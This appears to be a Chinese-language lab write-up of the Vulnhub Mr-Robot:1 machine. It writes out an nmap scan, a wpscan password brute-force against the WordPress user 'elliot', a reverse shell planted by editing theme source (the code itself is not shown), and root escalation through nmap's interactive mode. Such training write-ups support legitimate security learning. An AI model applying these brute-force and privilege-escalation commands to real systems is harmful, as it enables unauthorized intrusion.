Vulnhub:Mr-Robot:1靶机

发布时间 2023-03-22 21:10:58作者: ctostm

kali:192.168.111.111

靶机:192.168.111.237

信息收集

端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.237

image

访问robots.txt,发现两个文件

image

发现fsocity.dic可以下载,查看后推测是爆破用的字典

image

通过wordpress后台找回密码功能爆破用户名

image

image

使用wpscan爆破密码
wpscan --url http://192.168.111.237 -U elliot -P fsocity.dic

image

登录后台修改源码为反弹shell

image

获得反弹shell

image

提权

查找suid权限的文件
find / -perm -u=s 2> /dev/null

image

通过nmap进行提权,提权方法:https://gtfobins.github.io/gtfobins/nmap/#sudo
/usr/local/bin/nmap --interactive
!sh

image

提升为root

image